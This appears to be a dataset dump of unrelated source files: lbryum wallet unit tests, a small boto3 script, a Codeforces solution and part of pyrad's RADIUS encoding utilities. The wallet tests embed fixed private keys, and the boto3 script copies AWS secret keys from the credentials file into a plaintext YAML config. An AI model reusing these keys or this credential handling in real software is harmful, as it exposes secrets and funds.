cmds._serialize_certificate_key(tx.get_claim_id(0), SECP256K1_PRIVATE_KEY)\n return claim, tx, key\n\n def test_importcertificateinfo_no_args(self):\n self.assertEqual({}, MocCommands().importcertificateinfo())\n\n def test_importcertificateinfo(self):\n cmds = MocCommands()\n claim, tx, key = self._make_claim_tx_key(cmds)\n self.assertEqual(cmds.importcertificateinfo(key), {\n '84cdc6092acaaffe7f704766a3b3c83e369cb65f': {'success': True}\n })\n\n def test_importcertificateinfo_already_exists(self):\n cmds = MocCommands()\n claim, tx, key = self._make_claim_tx_key(cmds)\n cmds.wallet.save_certificate(tx.get_claim_id(0), SECP256K1_PRIVATE_KEY)\n self.assertEqual(cmds.importcertificateinfo(key), {\n '84cdc6092acaaffe7f704766a3b3c83e369cb65f': {\n 'error': 'refusing to overwrite certificate key already in the wallet',\n 'success': False\n }\n })\n\n def test_exportcertificateinfo(self):\n cmds = MocCommands()\n claim, tx, key = self._make_claim_tx_key(cmds)\n cmds.wallet.save_certificate(tx.get_claim_id(0), SECP256K1_PRIVATE_KEY)\n self.assertEqual(\n cmds.exportcertificateinfo(tx.get_claim_id(0)),\n '84cdc6092acaaffe7f704766a3b3c83e369cb65f2d2d2d2d2d424547494e204543'\n '2050524956415445204b45592d2d2d2d2d0a4d485143415145454950626a614566'\n '434343793548487647486b457733582f64544a586c72346a63454a4856314f6d63'\n '4244506d6f416347425375424241414b0a6f555144516741456c4c50726b564961'\n '7076744b727630446b67516239764158744351444249752b69486c735143356478'\n '315a6e4f575a7770594b51754d34690a4c4e6275546c667843485759776f76774c'\n '6a596e616f3869776770306f673d3d0a2d2d2d2d2d454e442045432050524956415'\n '445204b45592d2d2d2d2d0a'\n )\n\n\nclass TestGetBalanceCommand(unittest.TestCase):\n\n def test_getbalance_no_transactions(self):\n cmds = MocCommands()\n self.assertEqual({'confirmed': '0'}, cmds.getbalance())\n\n def test_getbalance(self):\n cmds = MocCommands()\n cmds.wallet.add_address_transaction(1000123000)\n cmds.wallet.add_claim_transaction('test', 5000123000)\n self.assertEqual({'confirmed': '60.00246'}, cmds.getbalance())\n\n def test_getbalance_exclude_claimtrie(self):\n cmds = MocCommands()\n cmds.wallet.add_address_transaction(1000123000)\n cmds.wallet.add_claim_transaction('test', 5000123000)\n self.assertEqual({'confirmed': '10.00123'}, cmds.getbalance(exclude_claimtrietx=True))\n\n\nclass TestGetMaxSpendableAmountForClaim(unittest.TestCase):\n\n def test_get_max_spendable_amount_for_claim(self):\n cmds = MocCommands()\n cmds.wallet.add_address_transaction(800000000)\n cmds.wallet.add_claim_transaction('test0', 100000000)\n cmds.wallet.add_claim_transaction('test1', 200000000)\n amount = cmds.get_max_spendable_amount_for_claim('test0')\n self.assertEqual(9.0, amount)\n amount = cmds.get_max_spendable_amount_for_claim(\"test1\")\n self.assertEqual(10.0, amount)\n # when the claim doesn't exist it should just list the confirmed balance\n amount = cmds.get_max_spendable_amount_for_claim(\"test2\")\n self.assertEqual(8.0, amount)\n\n def test_get_max_spendable_amount_for_claim_multiple_claims(self):\n cmds = MocCommands()\n cmds.wallet.add_address_transaction(800000000)\n cmds.wallet.add_claim_transaction('test0', 100000000)\n cmds.wallet.add_claim_transaction('test0', 200000000)\n result = cmds.get_max_spendable_amount_for_claim('test0')\n self.assertEqual(False, result['success'])\n\n\nclass TestPassthroughNetworkCommands(unittest.TestCase):\n\n def test_getblock(self):\n cmds = MocCommands()\n cmds.network = MocNetwork({\n 'blockchain.block.get_block': lambda arg: arg\n })\n self.assertEqual(['the hash'], cmds.getblock('the hash'))\n\n\nclass TestGetTransactionCommand(unittest.TestCase):\n\n def test_gettransaction_local(self):\n cmds = MocCommands()\n tx = cmds.wallet.add_address_transaction(1)\n self.assertEqual(\n {'inputs', 'lockTime', 'outputs', 'version'},\n set(cmds.gettransaction(tx.hash()))\n )\n\n def test_gettransaction_network(self):\n tx = transaction.Transaction.from_io([], [])\n tx.raw = tx.serialize()\n tx_hash = tx.hash()\n cmds = MocCommands()\n cmds.wallet = None\n cmds.network = MocNetwork({\n 'blockchain.transaction.get': lambda _: tx.raw\n })\n self.assertEqual(\n {'inputs': [], 'lockTime': 0, 'outputs': [], 'version': 1},\n cmds.gettransaction(tx_hash)\n )\n\n\nclass TestGetNameClaimsCommand(unittest.TestCase):\n\n def test_getnameclaims_no_claims(self):\n cmds = MocCommands()\n self.assertEqual([], cmds.getnameclaims())\n\n def test_getnameclaims_with_result(self):\n cmds = MocCommands()\n cmds.wallet.add_claim_transaction('test1', 1000123000)\n cmds.wallet.add_claim_transaction('test2', 5000123000)\n self.assertEqual(\n ['test1', 'test2'],\n [c['name'] for c in cmds.getnameclaims()]\n )\n\n\nclass TestGetClaimsForNameCommand(unittest.TestCase):\n\n def test_getclaimsforname_no_claims(self):\n cmds = MocCommands()\n cmds.network = MocNetwork({\n 'blockchain.claimtrie.getclaimsforname': lambda _: {'claims': []}\n })\n self.assertEqual({'claims': []}, cmds.getclaimsforname('test'))\n\n def test_getclaimsforname(self):\n cmds = MocCommands()\n cmds.network = MocNetwork({\n 'blockchain.claimtrie.getclaimsforname': lambda _: SAMPLE_CLAIMS_FOR_NAME_RESULT,\n 'blockchain.claimtrie.getclaimbyid': lambda _: None\n })\n self.assertEqual(9, len(cmds.getclaimsforname('test')['claims']))\n\n\nclass TestGetClaimByIdCommand(unittest.TestCase):\n\n def test_getclaimbyid_no_claims(self):\n cmds = MocCommands()\n cmds.network = MocNetwork({\n 'blockchain.claimtrie.getclaimbyid': lambda _: {}\n })\n self.assertEqual({}, cmds.getclaimbyid('test'))\n\n def test_getclaimbyid(self):\n cmds = MocCommands()\n cmds.network = MocNetwork({\n 'blockchain.claimtrie.getclaimbyid': lambda _: SAMPLE_CLAIMS_FOR_NAME_RESULT\n })\n self.assertEqual(9, len(cmds.getclaimbyid('test')['claims']))\n\n\nclass TestGetClaimByOutpointCommand(unittest.TestCase):\n\n def test_getclaimbyoutpoint_no_claims(self):\n cmds = MocCommands()\n cmds.network = MocNetwork({\n 'blockchain.claimtrie.getclaimsintx': lambda _: []\n })\n self.assertEqual(\n {'error': 'claim not found', 'outpoint': 'test:1', 'success': False},\n cmds.getclaimbyoutpoint('test', 1)\n )\n\n def test_getclaimbyoutpoint(self):\n cmds = MocCommands()\n cmds.network = MocNetwork({\n 'blockchain.claimtrie.getclaimsintx': lambda _: SAMPLE_CLAIMS_FOR_NAME_RESULT['claims']\n })\n self.assertEqual(16, len(cmds.getclaimbyoutpoint('test', 1)))\n\n\nclass TestGetClaimsFromTxCommand(unittest.TestCase):\n\n def test_getclaimsfromtx_no_claims(self):\n cmds = MocCommands()\n cmds.network = MocNetwork({\n 'blockchain.claimtrie.getclaimsintx': lambda _: []\n })\n self.assertEqual([], cmds.getclaimsfromtx('test'))\n\n def test_getclaimsfromtx(self):\n cmds = MocCommands()\n cmds.network = MocNetwork({\n 'blockchain.claimtrie.getclaimsintx': lambda _: SAMPLE_CLAIMS_FOR_NAME_RESULT['claims']\n })\n self.assertEqual(SAMPLE_CLAIMS_FOR_NAME_RESULT['claims'], cmds.getclaimsfromtx('test'))\n\n\nclass TestGetCertificateClaimsCommand(unittest.TestCase):\n\n def test_getcertificateclaims_empty(self):\n cmds = MocCommands()\n cmds.wallet.add_address_transaction(4003002001000)\n cmds.wallet.add_claim_transaction('lbry://@test', 1000)\n self.assertEqual([], cmds.getcertificateclaims())\n\n def test_getcertificateclaims(self):\n cmds = MocCommands()\n claim = ClaimDict.generate_certificate(SECP256K1_PRIVATE_KEY, curve=SECP256k1)\n cmds.wallet.add_address_transaction(4003002001000)\n tx = cmds.wallet.add_claim_transaction('lbry://@test', 1000, claim.serialized)\n cmds.wallet.save_certificate(tx.get_claim_id(0), SECP256K1_PRIVATE_KEY)\n cmds.wallet.set_default_certificate(tx.get_claim_id(0))\n self.assertEqual(1, len(cmds.getcertificateclaims()))\n self.assertIn('certificate', cmds.getcertificateclaims()[0]['value'])\n\n\nclass TestGetCertificatesForSigningCommand(unittest.TestCase):\n\n def test_getcertificatesforsigning_empty(self):\n cmds = MocCommands()\n cmds.wallet.add_address_transaction(4003002001000)\n cmds.wallet.add_claim_transaction('lbry://@test', 1000)\n self.assertEqual([], cmds.getcertificatesforsigning())\n\n def test_getcertificatesforsigning(self):\n cmds = MocCommands()\n claim = ClaimDict.generate_certificate(SECP256K1_PRIVATE_KEY, curve=SECP256k1)\n cmds.wallet.add_address_transaction(4003002001000)\n tx = cmds.wallet.add_claim_transaction('lbry://@test', 1000, claim.serialized)\n cmds.wallet.save_certificate(tx.get_claim_id(0), SECP256K1_PRIVATE_KEY)\n cmds.wallet.set_default_certificate(tx.get_claim_id(0))\n self.assertEqual(1, len(cmds.getcertificatesforsigning()))\n self.assertIn('certificate', cmds.getcertificateclaims()[0]['value'])\n\n\nclass TestGetValueForNameCommand(unittest.TestCase):\n\n def setUp(self):\n self.cmds = MocCommands()\n self.cmds.network.default_server = 'lbryum8.lbry.io:50001:t'\n self.cmds.network.blockchain.local_height = 316209\n self.cmds.network.heights = {\n self.cmds.network.default_server: self.cmds.network.blockchain.local_height\n }\n self.cmds.network.blockchain.respond_with_header = {\n 'nonce': 3669616010,\n 'prev_block_hash': '2861f2474292fdad2e3e57bb07d59afd42eb3b17c96fa387ba31af09c6cd5220',\n 'timestamp': 1517698627,\n 'merkle_root': 'cee32cc073fb0f62ce78ef14d0cd5de852d3e9e6af1c4f748bf402a34dfb05f2',\n 'claim_trie_root': '7e0e07df79b4eb7a3d1235ef03fb6a0bd2a581de8a33f570a9bffedb3afc3923',\n 'version': 536870912,\n 'bits': 436557565\n }\n\n def test_getvalueforname_no_value(self):\n self.cmds.network.responses = {\n 'blockchain.claimtrie.getvalue': lambda _: {}\n }\n self.assertEqual({'error': 'proof not in result'}, self.cmds.getvalueforname('five'))\n\n def test_getvalueforname(self):\n self.cmds.network.responses = {\n 'blockchain.claimtrie.getvalue': lambda _: SAMPLE_CLAIMTRIE_GETVALUE_RESULT\n }\n self.assertEqual(\n {'address', 'amount', 'claim_id', 'claim_sequence', 'decoded_claim', 'depth',\n 'effective_amount', 'has_signature', 'height', 'name', 'nout',\n 'permanent_url', 'supports', 'txid', 'value'},\n set(self.cmds.getvalueforname('five'))\n )\n\n\nclass TestGetValueForUriCommand(unittest.TestCase):\n\n def setUp(self):\n self.cmds = MocCommands()\n self.cmds.network.blockchain.local_height = 317927\n self.cmds.network.heights = {\n self.cmds.network.default_server: self.cmds.network.blockchain.local_height\n }\n self.cmds.network.blockchain.respond_with_header = {\n 'nonce': 3350083195,\n 'prev_block_hash': 'b9317a536af52914a000ebfeaf2b5353bac4c615d6de9bdc19459df9c91ffc5b',\n 'timestamp': 1517971678,\n 'merkle_root': '01a65e2fed60beb1c2375c521b2db31abfcb25685436fd35fab8ac1afd97e9b9',\n 'claim_trie_root': '8cf7a34f08a731334cc8473e18115ce81e59fec753f1bc6c73d0f8b493705ba5',\n 'version': 536870912,\n 'bits': 436486851\n }\n\n def test_getvalueforuri_no_value(self):\n self.cmds.network.responses = {\n 'blockchain.claimtrie.getvaluesforuris': lambda _: {}\n }\n self.assertEqual({}, self.cmds.getvalueforuri('lbry://five'))\n self.assertEqual({}, self.cmds.getvaluesforuris('lbry://five'))\n\n def test_getvalueforuri(self):\n self.cmds.network.responses = {\n 'blockchain.claimtrie.getvaluesforuris': lambda _: SAMPLE_CLAIMTRIE_GETVALUEFORURI_RESULT\n }\n self.assertEqual({'claim'}, set(self.cmds.getvalueforuri('lbry://five')))\n self.assertEqual({u'lbry://five'}, set(self.cmds.getvaluesforuris('lbry://five')))\n\n\nclass TestListAddressesCommand(unittest.TestCase):\n\n def test_listaddresses_no_value(self):\n cmds = MocCommands()\n out = cmds.listaddresses()\n self.assertEqual([], out)\n\n def test_listaddresses(self):\n cmds = MocCommands()\n cmds.wallet.create_new_address()\n out = cmds.listaddresses()\n self.assertEqual(['bScaWvgzAzFXzAcVgDDARfo9RFhdrm4pVc'], out)\n\n\nclass TestListUnspentCommand(unittest.TestCase):\n\n def test_listunspent_no_value(self):\n cmds = MocCommands()\n cmds.wallet.create_new_address()\n self.assertEqual([], cmds.listunspent())\n\n def test_listunspent(self):\n cmds = MocCommands()\n cmds.wallet.create_new_address()\n cmds.wallet.add_address_transaction(110000000)\n self.assertEqual([{\n 'address': 'bMF18XkZ6K9JT172dA4DxxQK92Q7XrQxCL',\n 'coinbase': False,\n 'height': 2,\n 'is_claim': False,\n 'is_support': False,\n 'is_update': False,\n 'prevout_hash': 'df303881e9014cce89c7acf55b124372e22979284baa99bb9fa178a9d35c97cb',\n 'prevout_n': 0,\n 'value': 1.1\n }], cmds.listunspent())\n\n\nclass TestGetPubKeysCommand(unittest.TestCase):\n\n def test_getpubkeys(self):\n cmds = MocCommands()\n address = cmds.wallet.create_new_address()\n self.assertEqual(\n ['02f0eaac8dde84cf80ebdb3b136cb29d8c7954c869c6c8fdf9d72a82323a72a30e'],\n cmds.getpubkeys(address)\n )\n\n\nclass TestIsMineCommand(unittest.TestCase):\n\n def test_ismine_yes(self):\n cmds = MocCommands()\n address = cmds.wallet.create_new_address()\n self.assertEqual(True, cmds.ismine(address))\n\n def test_ismine_no(self):\n cmds = MocCommands()\n cmds.wallet.create_new_address()\n self.assertEqual(False, cmds.ismine('deadbeef'*12))\n\n\nclass TestClaimHistoryCommand(unittest.TestCase):\n\n def test_claimhistory_empty(self):\n cmds = MocCommands()\n cmds.wallet.create_new_address()\n self.assertEqual([], cmds.claimhistory())\n\n def test_claimhistory(self):\n cmds = MocCommands()\n cmds.wallet.add_address_transaction(510000000)\n cmds.wallet.make_last_tx_verified()\n tx = cmds.wallet.add_claim_transaction('test', 310000000)\n cmds.wallet.make_last_tx_verified()\n cmds.wallet.add_support_transaction(\n 'test', 110000000, tx.get_claim_id(0), \"bRcHraa8bYJZL7vkh5sNmGwPDERFUjGPP9\"\n )\n cmds.wallet.make_last_tx_verified()\n self.assertEqual([5.1, 3.1, 1.1], [h['value'] for h in cmds.claimhistory()])\n\n\nclass TestPayToCommand(unittest.TestCase):\n\n def test_payto_success(self):\n cmds = MocCommands()\n cmds.wallet.add_address_transaction(510000000)\n cmds.wallet.create_new_address(for_change=True)\n destination = cmds.wallet.create_new_address()\n out = cmds.payto([(destination, 1)])\n self.assertEqual(True, out['success'])\n\n def test_payto_throws_not_enough_funds(self):\n cmds = MocCommands()\n cmds.wallet.add_address_transaction(510000000)\n cmds.wallet.create_new_address(for_change=True)\n destination = cmds.wallet.create_new_address()\n with self.assertRaises(NotEnoughFunds):\n cmds.payto([(destination, 510000)])\n\n\nclass TestClaimCommand(unittest.TestCase):\n\n def test_claim_success(self):\n cmds = MocCommands()\n cmds.wallet.add_address_transaction(110000000)\n out = cmds.claim('test', 'value', 1, skip_validate_schema=True, raw=True)\n self.assertEqual(True, out['success'])\n\n def test_claim_not_enough_funds(self):\n cmds = MocCommands()\n out = cmds.claim('test', '[payload]', 1, skip_validate_schema=True, raw=True)\n self.assertEqual(False, out['success'])\n self.assertEqual('Not enough funds', out['reason'])\n\n def test_claim_fee(self):\n cmds = MocCommands()\n cmds.wallet.add_address_transaction(110000000)\n\n name = '0'*50\n out = cmds.claim(name, 'value', 1, skip_validate_schema=True, raw=True)\n self.assertEqual(True, out['success'])\n self.assertEqual(LBRYCRD_MIN_FEE_PER_NAMECLAIM_CHAR*50, float(out['fee'])*COIN)\n\n out = cmds.claim('1', 'value', 1, skip_validate_schema=True, raw=True)\n self.assertEqual(True, out['success'])\n self.assertEqual(LBRYCRD_MIN_FEE_PER_NAMECLAIM_CHAR, float(out['fee'])*COIN)\n\nclass TestRenewClaimCommand(unittest.TestCase):\n\n def test_renewclaim_success(self):\n cmds = MocCommands()\n cmds.wallet.add_address_transaction(510000000)\n tx = cmds.wallet.add_claim_transaction('test', 100200)\n out = cmds.renewclaim(tx.hash(), 0, skip_validate_schema=True)\n self.assertEqual(True, out['success'])\n\n def test_renewclaim_fee_more_than_original_bid(self):\n cmds = MocCommands()\n cmds.wallet.add_address_transaction(510000000)\n tx = cmds.wallet.add_claim_transaction('test', 10)\n out = cmds.renewclaim(tx.hash(), 0, skip_validate_schema=True)\n self.assertEqual(False, out['success'])\n self.assertEqual('Fee will exceed amount available in original bid. Increase amount', out['reason'])\n\n\nclass TestRenewClaimBeforeExpirationCommand(unittest.TestCase):\n\n def test_renewclaimbeforeexpiration_success(self):\n cmds = MocCommands()\n cmds.wallet.add_address_transaction(510000000)\n cmds.wallet.add_claim_transaction('test', 100200)\n out = cmds.renewclaimsbeforeexpiration(270000, skip_validate_schema=True)\n self.assertEqual(1, len(out.values()))\n self.assertEqual(True, out.values()[0]['success'])\n\n def test_renewclaimbeforeexpiration_nothing_renewed(self):\n cmds = MocCommands()\n cmds.wallet.add_address_transaction(510000000)\n cmds.wallet.add_claim_transaction('test', 100200)\n out = cmds.renewclaimsbeforeexpiration(260000, skip_validate_schema=True)\n self.assertEqual(0, len(out.values()))\n\n\nclass TestClaimCertificateCommand(unittest.TestCase):\n\n def test_claimcertificate_success(self):\n cmds = MocCommands()\n cmds.wallet.add_address_transaction(4003002001000)\n out = cmds.claimcertificate('lbry://@test', 1000)\n self.assertEqual(True, out['success'])\n\n def test_claim_not_enough_funds(self):\n cmds = MocCommands()\n cmds.wallet.add_address_transaction(3002001000)\n out = cmds.claimcertificate('lbry://@test', 1000)\n self.assertEqual(False, out['success'])\n self.assertEqual('Not enough funds', out['reason'])\n\n\nclass TestUpdateCommand(unittest.TestCase):\n\n def test_update_success(self):\n cmds = MocCommands()\n cmds.wallet.add_address_transaction(510000000)\n cmds.wallet.add_claim_transaction('test', 1)\n out = cmds.update('test', '[payload]', amount=1, tx_fee=1, skip_validate_schema=True, raw=True)\n self.assertEqual(True, out['success'])\n\n def test_update_not_enough_funds(self):\n cmds = MocCommands()\n cmds.wallet.add_address_transaction(110000000)\n cmds.wallet.add_claim_transaction('test', 1)\n out = cmds.update('test', '[payload]', amount=1, tx_fee=1, skip_validate_schema=True, raw=True)\n self.assertEqual(False, out['success'])\n self.assertEqual('Not enough funds', out['reason'])\n\n def test_update_not_found(self):\n cmds = MocCommands()\n cmds.wallet.add_address_transaction(510000000)\n cmds.wallet.add_claim_transaction('test', 1)\n out = cmds.update('foo', '[payload]', amount=1, tx_fee=1, skip_validate_schema=True, raw=True)\n self.assertEqual(False, out['success'])\n self.assertEqual('No claim to update', out['reason'])\n\n\nclass TestSendClaimToAddressCommand(unittest.TestCase):\n\n def test_sendclaimtoaddress_success(self):\n cmds = MocCommands()\n cmds.wallet.add_address_transaction(510000000)\n tx = cmds.wallet.add_claim_transaction('test', 1)\n destination = cmds.wallet.create_new_address()\n out = cmds.sendclaimtoaddress(tx.get_claim_id(0), destination, 1, skip_validate_schema=True)\n self.assertEqual(True, out['success'])\n\n def test_sendclaimtoaddress_not_enough_funds(self):\n cmds = MocCommands()\n cmds.wallet.add_address_transaction(1000)\n tx = cmds.wallet.add_claim_transaction('test', 1)\n destination = cmds.wallet.create_new_address()\n out = cmds.sendclaimtoaddress(tx.get_claim_id(0), destination, 1, skip_validate_schema=True)\n self.assertEqual(False, out['success'])\n self.assertEqual('Not enough funds', out['reason'])\n\n def test_sendclaimtoaddress_not_found(self):\n cmds = MocCommands()\n cmds.wallet.add_address_transaction(510000000)\n cmds.wallet.add_claim_transaction('test', 1)\n destination = cmds.wallet.create_new_address()\n out = cmds.sendclaimtoaddress('invalid', destination, 1, skip_validate_schema=True)\n self.assertEqual(False, out['success'])\n self.assertEqual('claim not found', out['reason'])\n\n\nclass TestSupportCommand(unittest.TestCase):\n\n def test_support_success(self):\n cmds = MocCommands()\n cmds.wallet.add_address_transaction(510000000)\n tx = cmds.wallet.add_claim_transaction('test', 1)\n out = cmds.support('test', tx.get_claim_id(0), 1, tx_fee=1)\n self.assertEqual(True, out['success'])\n\n def test_support_invalid_claim_id(self):\n cmds = MocCommands()\n cmds.wallet.add_address_transaction(10000000)\n out = cmds.support('test', 'deadbeef', 1, tx_fee=1)\n self.assertEqual(False, out['success'])\n self.assertEqual('Invalid claim id', out['reason'])\n\n def test_support_not_enough_funds(self):\n cmds = MocCommands()\n cmds.wallet.add_address_transaction(10000000)\n tx = cmds.wallet.add_claim_transaction('test', 1)\n out = cmds.support('test', tx.get_claim_id(0), 1, tx_fee=1)\n self.assertEqual(False, out['success'])\n self.assertEqual('Not enough funds', out['reason'])\n\n\nclass TestSendWithSupportCommand(unittest.TestCase):\n\n def test_sendwithsupport_success(self):\n cmds = MocCommands()\n cmds.wallet.add_address_transaction(510000000)\n tx = cmds.wallet.add_claim_transaction('test', 1)\n cmds.network = MocNetwork({\n 'blockchain.claimtrie.getclaimbyid': lambda _: SAMPLE_CLAIMS_FOR_NAME_RESULT['claims'][0]\n })\n out = cmds.sendwithsupport(tx.get_claim_id(0), 1)\n self.assertEqual(True, out['success'])\n\n\nclass TestAbandonCommand(unittest.TestCase):\n\n def abandon_claim_with_name_value(self, name, satoshis, cmds=None):\n cmds = cmds or MocCommands()\n cmds.wallet.create_new_address(for_change=True)\n tx = cmds.wallet.add_claim_transaction(name, satoshis)\n return cmds.abandon(claim_id=tx.get_claim_id(0))\n\n def test_abandon_success(self):\n out = self.abandon_claim_with_name_value('test', 10000)\n self.assertEqual(True, out['success'])\n\n def test_abandon_fails_for_tiny_claim(self):\n out = self.abandon_claim_with_name_value('test', 1000)\n self.assertEqual(False, out['success'])\n self.assertEqual('transaction fee exceeds amount available', out['reason'])\n\n def test_abandon_fails_for_tiny_claim_and_not_enough_other_funds(self):\n cmds = MocCommands()\n cmds.wallet.add_address_transaction(500)\n out = self.abandon_claim_with_name_value('test', 1000, cmds)\n self.assertEqual(False, out['success'])\n self.assertEqual('transaction fee exceeds amount available', out['reason'])\n\n def test_abandon_success_for_tiny_claim_with_enough_other_funds(self):\n cmds = MocCommands()\n cmds.wallet.add_address_transaction(12000)\n cmds.wallet.add_address_transaction(12000)\n out = self.abandon_claim_with_name_value('test', 1000, cmds)\n self.assertEqual(True, out['success'])\n sent = cmds.wallet.sent_transactions[0]\n self.assertEqual(len(sent._inputs), 3)\n self.assertEqual(sent._inputs[0]['value'], 1000)\n self.assertEqual(sent._inputs[1]['value'], 12000)\n self.assertEqual(sent._inputs[2]['value'], 12000)\n self.assertEqual(len(sent._outputs), 1)\n self.assertEqual(sent._outputs[0][2], 600)\n\n\nclass TestSweepCommand(unittest.TestCase):\n\n private_key = \"L52XzL2cMkHxqxBXRyEpnPQZGUs3uKiL3R11XbAdHigRzDozKZeW\"\n\n def test_sweep_no_unspent(self):\n cmds = MocCommands()\n cmds.network = MocNetwork({\n 'blockchain.address.listunspent': lambda _: []\n })\n destination = cmds.wallet.create_new_address()\n result = cmds.sweep(self.private_key, destination)\n self.assertEqual(False, result['success'])\n\n def test_sweep(self):\n cmds = MocCommands()\n cmds.wallet.add_address_transaction(120000)\n cmds.wallet.add_address_transaction(120000)\n unspent = []\n for tx in cmds.wallet.transactions.values():\n for output in tx._outputs:\n unspent.append((tx.hash(), output))\n cmds.network = MocNetwork({\n 'blockchain.address.listunspent': lambda _: [{\n 'tx_hash': tx_hash,\n 'tx_pos': 1,\n 'address': address,\n 'coinbase': False,\n 'height': 2,\n 'is_claim': False,\n 'is_support': False,\n 'is_update': False,\n 'prevout_hash': 'df303881e9014cce89c7acf55b124372e22979284baa99bb9fa178a9d35c97cb',\n 'prevout_n': 0,\n 'value': amount\n } for (tx_hash, (type, address, amount)) in unspent]\n })\n destination = cmds.wallet.create_new_address()\n result = cmds.sweep(self.private_key, destination)\n self.assertEqual(True, result['success'])\n sent = Transaction(result['tx'])\n sent.deserialize()\n self.assertEqual(len(sent._outputs), 1)\n self.assertEqual(sent._outputs[0][2], 230000)\n\n\nclass FormatTests(unittest.TestCase):\n\n def test_format_lbrycrd_keys(self):\n a = {'amount': 100000000}\n out = commands.format_amount_value(a)\n self.assertEqual(1.0, out['amount'])\n","repo_name":"feitianyiren/lbryum","sub_path":"tests/test_commands.py","file_name":"test_commands.py","file_ext":"py","file_size_in_byte":31174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"73485233424","text":"import ConfigParser\nimport os\nimport yaml\nimport boto3\n\ns3 = boto3.client('s3')\n\nbucketname = 'test-athena-parquet'\n\nos.path.expanduser('~')\nconfig = ConfigParser.ConfigParser()\nconfig.read(os.path.expanduser('~/.aws/credentials'))\n\naws_access_key_id = config.get('default', 'aws_access_key_id')\naws_secret_access_key = config.get('default', 'aws_secret_access_key')\n\ndic = {\n 'out': {\n 'type': 'parquet',\n 'path_prefix': 's3a://' + bucketname + '/titanic/',\n 'extra_configurations': {\n 'fs.s3a.access.key': aws_access_key_id,\n 'fs.s3a.secret.key': aws_secret_access_key\n }\n }\n}\n\nwith open('_outs3.yml.liquid', 'w') as f:\n yaml.dump(dic, f, default_flow_style=False)\n","repo_name":"imura81gt/test-athena","sub_path":"read.py","file_name":"read.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14276786195","text":"# https://codeforces.com/contest/160/problem/A\n\nn = int(input())\ncoins = list(map(int, input().split()))\ncoins.sort(reverse=True)\ntotal = sum(coins)\ncount = 0\ntemp_sum = 0\nfor i in coins:\n count += 1\n temp_sum += i\n total -= i\n if total < temp_sum:\n break\n\n\nprint(count)\n","repo_name":"rajeevdodda/Codeforces","sub_path":"CF-A/101-200/CF160-D2-A.py","file_name":"CF160-D2-A.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36656892094","text":"# tools.py\n#\n# Utility functions\nfrom netaddr import IPAddress\nfrom netaddr import IPNetwork\nimport struct\nimport six\nimport binascii\n\n\ndef EncodeString(str):\n if len(str) > 253:\n raise ValueError('Can only encode strings of <= 253 characters')\n if isinstance(str, six.text_type):\n return str.encode('utf-8')\n else:\n return str\n\n\ndef EncodeOctets(str):\n if len(str) > 253:\n raise ValueError('Can only encode strings of <= 253 characters')\n\n if str.startswith(b'0x'):\n hexstring = str.split(b'0x')[1]\n return binascii.unhexlify(hexstring)\n else:\n return str\n\n\ndef EncodeAddress(addr):\n if not isinstance(addr, six.string_types):\n raise TypeError('Address has to be a string')\n return IPAddress(addr).packed\n\n\ndef EncodeIPv6Prefix(addr):\n if not isinstance(addr, six.string_types):\n raise TypeError('IPv6 Prefix has to be a string')\n ip = IPNetwork(addr)\n return struct.pack('2B', *[0, ip.prefixlen]) + ip.ip.packed\n\n\ndef EncodeIPv6Address(addr):\n if not isinstance(addr, six.string_types):\n raise TypeError('IPv6 Address has to be a string')\n return IPAddress(addr).packed\n\n\ndef EncodeAscendBinary(str):\n \"\"\"\n Format: List of type=value pairs sperated by spaces.\n\n Example: 'family=ipv4 action=discard direction=in dst=10.10.255.254/32'\n\n Type:\n family ipv4(default) or ipv6\n action discard(default) or accept\n direction in(default) or out\n src source prefix (default ignore)\n dst destination prefix (default ignore)\n proto protocol number / next-header number (default ignore)\n sport source port (default ignore)\n dport destination port (default ignore)\n sportq source port qualifier (default 0)\n dportq destination port qualifier (default 0)\n\n Source/Destination Port Qualifier:\n 0 no compare\n 1 less than\n 2 equal to\n 3 greater than\n 4 not equal to\n \"\"\"\n\n terms = {\n 'family': b'\\x01',\n 'action': b'\\x00',\n 'direction': b'\\x01',\n 'src': b'\\x00\\x00\\x00\\x00',\n 'dst': b'\\x00\\x00\\x00\\x00',\n 'srcl': b'\\x00',\n 'dstl': b'\\x00',\n 'proto': b'\\x00',\n 'sport': b'\\x00\\x00',\n 'dport': b'\\x00\\x00',\n 'sportq': b'\\x00',\n 'dportq': b'\\x00'\n }\n\n for t in str.split(' '):\n key, value = t.split('=')\n if key == 'family' and value == 'ipv6':\n terms[key] = b'\\x03'\n if terms['src'] == b'\\x00\\x00\\x00\\x00':\n terms['src'] = 16 * b'\\x00'\n if terms['dst'] == b'\\x00\\x00\\x00\\x00':\n terms['dst'] = 16 * b'\\x00'\n elif key == 'action' and value == 'accept':\n terms[key] = b'\\x01'\n elif key == 'direction' and value == 'out':\n terms[key] = b'\\x00'\n elif key == 'src' or key == 'dst':\n ip = IPNetwork(value)\n terms[key] = ip.ip.packed\n terms[key+'l'] = struct.pack('B', ip.prefixlen)\n elif key == 'sport' or key == 'dport':\n terms[key] = struct.pack('!H', int(value))\n elif key == 'sportq' or key == 'dportq' or key == 'proto':\n terms[key] = struct.pack('B', int(value))\n\n trailer = 8 * b'\\x00'\n\n result = b''.join((terms['family'], terms['action'], terms['direction'], b'\\x00', \n terms['src'], terms['dst'], terms['srcl'], terms['dstl'], terms['proto'], b'\\x00',\n terms['sport'], terms['dport'], terms['sportq'], terms['dportq'], b'\\x00\\x00', trailer))\n return result\n\n\ndef EncodeInteger(num, format='!I'):\n try:\n num = int(num)\n except:\n raise TypeError('Can not encode non-integer as integer')\n return struct.pack(format, num)\n\ndef EncodeInteger64(num, format='!Q'):\n try:\n num = int(num)\n except:\n raise TypeError('Can not encode non-integer as integer64')\n return struct.pack(format, num)\n\ndef EncodeDate(num):\n if not isinstance(num, int):\n raise TypeError('Can not encode non-integer as date')\n return struct.pack('!I', num)\n\n\ndef DecodeString(str):\n try:\n return str.decode('utf-8')\n except:\n return str\n\n\ndef DecodeOctets(str):\n return str\n\n\ndef DecodeAddress(addr):\n return '.'.join(map(str, struct.unpack('BBBB', addr)))\n\n\ndef DecodeIPv6Prefix(addr):\n addr = addr + b'\\x00' * (18-len(addr))\n _, length, prefix = ':'.join(map('{0:x}'.format, struct.unpack('!BB'+'H'*8, 